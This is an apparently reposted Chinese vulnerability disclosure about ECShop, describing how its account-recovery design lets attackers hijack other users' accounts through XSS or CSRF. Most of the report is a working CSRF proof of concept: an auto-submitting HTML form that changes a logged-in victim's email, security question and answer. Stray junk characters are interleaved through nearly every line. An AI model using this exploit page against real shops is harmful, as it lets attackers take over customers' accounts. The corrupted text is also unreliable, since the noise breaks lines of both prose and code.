简要描述:0 i( D2 I0 |/ Z7 Q# c1 @
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
6 a$ {+ r3 i( O' T( q ?
. i8 D, ?2 U3 T3 K8 uDemo For:http://www.wooyun.org/bug.php?action=view&id=395
$ R7 F/ Q: H4 B0 g* l2 W, m7 m5 s6 N
详细说明:
1 \4 f1 v) ^& [! Y* H- r, T利用csrf和xss可以突破官方所说的“障碍”
( v2 q; X" G; g* W& p6 s' ]xss版本已经有人说明, t- o4 t" ~" b. z' A* U0 w' d
这里给出csrf版本
. \$ W% ] _* O0 V$ F* E" }; ^5 E7 S% P
漏洞证明:$ U3 g- P/ Q' @1 o! B/ K3 Z
<html>1 {! ?2 ]( k7 X; ^4 F1 W
<body># s6 g. x# m/ S; `: d0 k
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">0 B9 i' Y# H8 T9 M
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">6 V( M% _- c, Z& j( R
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
) |8 q, Y8 m& Y<INPUT TYPE="text" NAME="sel_question" value="ecshop"># u. e/ ~" b3 ~# C* y
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">0 S! ~1 ]# T+ p& u0 x% E
</body>
" n( r ~* N# a* `! M) c" M<script>. ~1 V1 A0 x# _' c$ i
document.forms[0].submit();
% q( J9 R( a O7 c; l# ^</script>! W# z, N! v- P8 c8 U) }
</html>0 P- z8 i7 v) |! z; K
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
* g( w& h ]0 ]% W! A4 W- ^. d5 k U$ U3 d j1 u( {' l
|